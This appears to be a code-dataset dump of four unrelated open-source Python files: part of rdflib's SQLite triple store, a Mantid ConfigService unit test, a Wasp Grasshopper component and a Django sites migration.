if not self.STRONGLY_TYPED_TERMS or isinstance(obj,Literal) or not obj or (self.STRONGLY_TYPED_TERMS and isinstance(obj,REGEXTerm)):
clauseString,params = self.buildClause('literal',subject,predicate,obj,context)
parameters.extend(params)
selects.append((
literal_table,
'literal',
clauseString,
ASSERTED_LITERAL_PARTITION
))
if not isinstance(obj,Literal) and not (isinstance(obj,REGEXTerm) and self.STRONGLY_TYPED_TERMS) or not obj:
clauseString,params = self.buildClause('asserted',subject,predicate,obj,context)
parameters.extend(params)
selects.append((
asserted_table,
'asserted',
clauseString,
ASSERTED_NON_TYPE_PARTITION
))
clauseString,params = self.buildClause('typeTable',subject,RDF.type,obj,context,True)
parameters.extend(params)
selects.append(
(
asserted_type_table,
'typeTable',
clauseString,
ASSERTED_TYPE_PARTITION
)
)
elif predicate:
#select from asserted non rdf:type partition (optionally), quoted partition (if context is speciied), and literal partition (optionally)
selects = []
if not self.STRONGLY_TYPED_TERMS or isinstance(obj,Literal) or not obj or (self.STRONGLY_TYPED_TERMS and isinstance(obj,REGEXTerm)):
clauseString,params = self.buildClause('literal',subject,predicate,obj,context)
parameters.extend(params)
selects.append((
literal_table,
'literal',
clauseString,
ASSERTED_LITERAL_PARTITION
))
if not isinstance(obj,Literal) and not (isinstance(obj,REGEXTerm) and self.STRONGLY_TYPED_TERMS) or not obj:
clauseString,params = self.buildClause('asserted',subject,predicate,obj,context)
parameters.extend(params)
selects.append((
asserted_table,
'asserted',
clauseString,
ASSERTED_NON_TYPE_PARTITION
))
if context is not None:
clauseString,params = self.buildClause('quoted',subject,predicate, obj,context)
parameters.extend(params)
selects.append(
(
quoted_table,
'quoted',
clauseString,
QUOTED_PARTITION
)
)
q=self._normalizeSQLCmd(unionSELECT(selects,selectType=TRIPLE_SELECT_NO_ORDER))
self.executeSQL(c,q,parameters)
#NOTE: SQLite does not support ORDER BY terms that aren't integers, so the entire result set must be iterated
#in order to be able to return a generator of contexts
tripleCoverage = {}
result = c.fetchall()
c.close()
for rt in result:
s,p,o,(graphKlass,idKlass,graphId) = extractTriple(rt,self,context)
contexts = tripleCoverage.get((s,p,o),[])
contexts.append(graphKlass(self,idKlass(graphId)))
tripleCoverage[(s,p,o)] = contexts
for (s,p,o),contexts in tripleCoverage.items():
yield (s,p,o),(c for c in contexts)
CREATE_ASSERTED_STATEMENTS_TABLE = """
CREATE TABLE %s_asserted_statements (
subject text not NULL,
predicate text not NULL,
object text not NULL,
context text not NULL,
termComb tinyint unsigned not NULL)"""
CREATE_ASSERTED_TYPE_STATEMENTS_TABLE = """
CREATE TABLE %s_type_statements (
member text not NULL,
klass text not NULL,
context text not NULL,
termComb tinyint unsigned not NULL)"""
CREATE_LITERAL_STATEMENTS_TABLE = """
CREATE TABLE %s_literal_statements (
subject text not NULL,
predicate text not NULL,
object text,
context text not NULL,
termComb tinyint unsigned not NULL,
objLanguage varchar(3),
objDatatype text)"""
CREATE_QUOTED_STATEMENTS_TABLE = """
CREATE TABLE %s_quoted_statements (
subject text not NULL,
predicate text not NULL,
object text,
context text not NULL,
termComb tinyint unsigned not NULL,
objLanguage varchar(3),
objDatatype text)"""
CREATE_NS_BINDS_TABLE = """
CREATE TABLE %s_namespace_binds (
prefix varchar(20) UNIQUE not NULL,
uri text,
PRIMARY KEY (prefix))"""
|
aaronsw/watchdog
|
vendor/rdflib-2.4.0/rdflib/store/SQLite.py
|
Python
|
agpl-3.0
| 18,855 | 0.016547 |
from __future__ import (absolute_import, division, print_function)
import unittest
import os
import testhelpers
from mantid.kernel import (ConfigService, ConfigServiceImpl, config,
std_vector_str, FacilityInfo, InstrumentInfo)
class ConfigServiceTest(unittest.TestCase):
__dirs_to_rm = []
__init_dir_list = ''
def test_singleton_returns_instance_of_ConfigService(self):
self.assertTrue(isinstance(config, ConfigServiceImpl))
def test_getLocalFilename(self):
local = config.getLocalFilename().lower()
self.assertTrue('local' in local)
def test_getUserFilename(self):
user = config.getUserFilename().lower()
self.assertTrue('user' in user)
def test_getFacilityReturns_A_FacilityInfo_Object(self):
facility = config.getFacility()
self.assertTrue(isinstance(facility, FacilityInfo))
def test_getFacility_With_Name_Returns_A_FacilityInfo_Object(self):
facility = config.getFacility("ISIS")
self.assertTrue(isinstance(facility, FacilityInfo))
self.assertRaises(RuntimeError, config.getFacility, "MadeUpFacility")
def test_getFacilities_Returns_A_FacilityInfo_List(self):
facilities = config.getFacilities()
self.assertTrue(isinstance(facilities[0], FacilityInfo))
def test_getFacilities_and_Facility_Names_are_in_sync_and_non_empty(self):
facilities = config.getFacilities()
names = config.getFacilityNames()
self.assertTrue(len(names)>0)
self.assertEquals(len(names),len(facilities))
for i in range(len(names)):
self.assertEquals(names[i],facilities[i].name())
def test_update_and_set_facility(self):
self.assertFalse("TEST" in config.getFacilityNames())
ConfigService.updateFacilities(os.path.join(ConfigService.getInstrumentDirectory(),"IDFs_for_UNIT_TESTING/UnitTestFacilities.xml"))
ConfigService.setFacility("TEST")
self.assertEquals(config.getFacility().name(), "TEST")
self.assertRaises(RuntimeError, config.getFacility, "SNS")
def test_getInstrumentReturns_A_InstrumentInfo_Object(self):
self.assertTrue(isinstance(config.getInstrument("WISH"), InstrumentInfo))
self.assertRaises(RuntimeError, config.getInstrument, "MadeUpInstrument")
def test_service_acts_like_dictionary(self):
test_prop = "algorithms.retained"
self.assertTrue(config.hasProperty(test_prop))
dictcall = config[test_prop]
fncall = config.getString(test_prop)
self.assertEquals(dictcall, fncall)
self.assertNotEqual(config[test_prop], "")
old_value = fncall
config.setString(test_prop, "1")
self.assertEquals(config.getString(test_prop), "1")
config[test_prop] = "2"
self.assertEquals(config.getString(test_prop), "2")
config.setString(test_prop, old_value)
def test_getting_search_paths(self):
"""Retrieve the search paths
"""
paths = config.getDataSearchDirs()
self.assertEquals(type(paths), std_vector_str)
self.assert_(len(paths) > 0)
def test_setting_paths_via_single_string(self):
new_path_list = self._setup_test_areas()
path_str = ';'.join(new_path_list)
config.setDataSearchDirs(path_str)
paths = config.getDataSearchDirs()
# Clean up here do that if the assert fails
# it doesn't bring all the other tests down
self._clean_up_test_areas()
self.assertTrue(len(paths), 2)
self.assertTrue('tmp' in paths[0])
self.assertTrue('tmp_2' in paths[1])
self._clean_up_test_areas()
def test_setting_log_channel_levels(self):
testhelpers.assertRaisesNothing(self, config.setFileLogLevel, 4)
testhelpers.assertRaisesNothing(self, config.setConsoleLogLevel, 4)
def _setup_test_areas(self):
"""Create a new data search path string
"""
self.__init_dir_list = config['datasearch.directories']
# Set new paths - Make a temporary directory so that I know where it is
test_path = os.path.join(os.getcwd(), "tmp")
try:
os.mkdir(test_path)
self.__dirs_to_rm.append(test_path)
except OSError:
pass
test_path_two = os.path.join(os.getcwd(), "tmp_2")
try:
os.mkdir(test_path_two)
self.__dirs_to_rm.append(test_path_two)
except OSError:
pass
return [test_path, test_path_two]
def _clean_up_test_areas(self):
config['datasearch.directories'] = self.__init_dir_list
# Remove temp directories
for p in self.__dirs_to_rm:
try:
os.rmdir(p)
except OSError:
pass
if __name__ == '__main__':
unittest.main()
|
dymkowsk/mantid
|
Framework/PythonInterface/test/python/mantid/kernel/ConfigServiceTest.py
|
Python
|
gpl-3.0
| 4,880 | 0.002459 |
# Wasp: Discrete Design with Grasshopper plug-in (GPL) initiated by Andrea Rossi
#
# This file is part of Wasp.
#
# Copyright (c) 2017, Andrea Rossi <[email protected]>
# Wasp is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 3 of the License,
# or (at your option) any later version.
#
# Wasp is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Wasp; If not, see <http://www.gnu.org/licenses/>.
#
# @license GPL-3.0 <https://www.gnu.org/licenses/gpl.html>
#
# Significant parts of Wasp have been developed by Andrea Rossi
# as part of research on digital materials and discrete design at:
# DDU Digital Design Unit - Prof. Oliver Tessmann
# Technische Universitt Darmstadt
#########################################################################
## COMPONENT INFO ##
#########################################################################
"""
Export Wasp information for DisCo VR software
-
Provided by Wasp 0.5
Args:
NAME: Rule group name. It will be used to activate/deactivate the rules contained in DisCo
GR: Rule grammars to be included in the group
Returns:
RULE_G: Rule Group instance
"""
ghenv.Component.Name = "Wasp_DisCo Rule Group"
ghenv.Component.NickName = 'RuleG'
ghenv.Component.Message = 'v0.5.005'
ghenv.Component.IconDisplayMode = ghenv.Component.IconDisplayMode.application
ghenv.Component.Category = "Wasp"
ghenv.Component.SubCategory = "7 | DisCo VR"
try: ghenv.Component.AdditionalHelpFromDocStrings = "5"
except: pass
import sys
import json
import Rhino.Geometry as rg
import Grasshopper as gh
## add Wasp install directory to system path
wasp_loaded = False
ghcompfolder = gh.Folders.DefaultAssemblyFolder
if ghcompfolder not in sys.path:
sys.path.append(ghcompfolder)
try:
from wasp import __version__
wasp_loaded = True
except:
msg = "Cannot import Wasp. Is the wasp folder available in " + ghcompfolder + "?"
ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Error, msg)
## if Wasp is installed correctly, load the classes required by the component
if wasp_loaded:
from wasp.disco import DisCoRuleGroup
def main(group_name, rule_grammar):
check_data = True
## check inputs
if group_name is None:
check_data = False
msg = "No group name provided"
ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Warning, msg)
if len(rule_grammar) == 0:
check_data = False
msg = "No rules grammar provided"
ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Warning, msg)
if check_data:
return DisCoRuleGroup(group_name, rule_grammar)
else:
return -1
result = main(NAME, GR)
if result != -1:
RULE_G = result
|
ar0551/Wasp
|
src/ghComp/Wasp_DisCo Rule Group.py
|
Python
|
gpl-3.0
| 3,209 | 0.011218 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
"""Set site domain and name."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
"domain": "choimirai.com",
"name": "Django Tutorial"
}
)
def update_site_backward(apps, schema_editor):
"""Revert site domain and name to default."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
"domain": "example.com",
"name": "example.com"
}
)
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
]
operations = [
migrations.RunPython(update_site_forward, update_site_backward),
]
|
gijigae/django-tutorial
|
django_tutorial/contrib/sites/migrations/0002_set_site_domain_and_name.py
|
Python
|
bsd-3-clause
| 949 | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.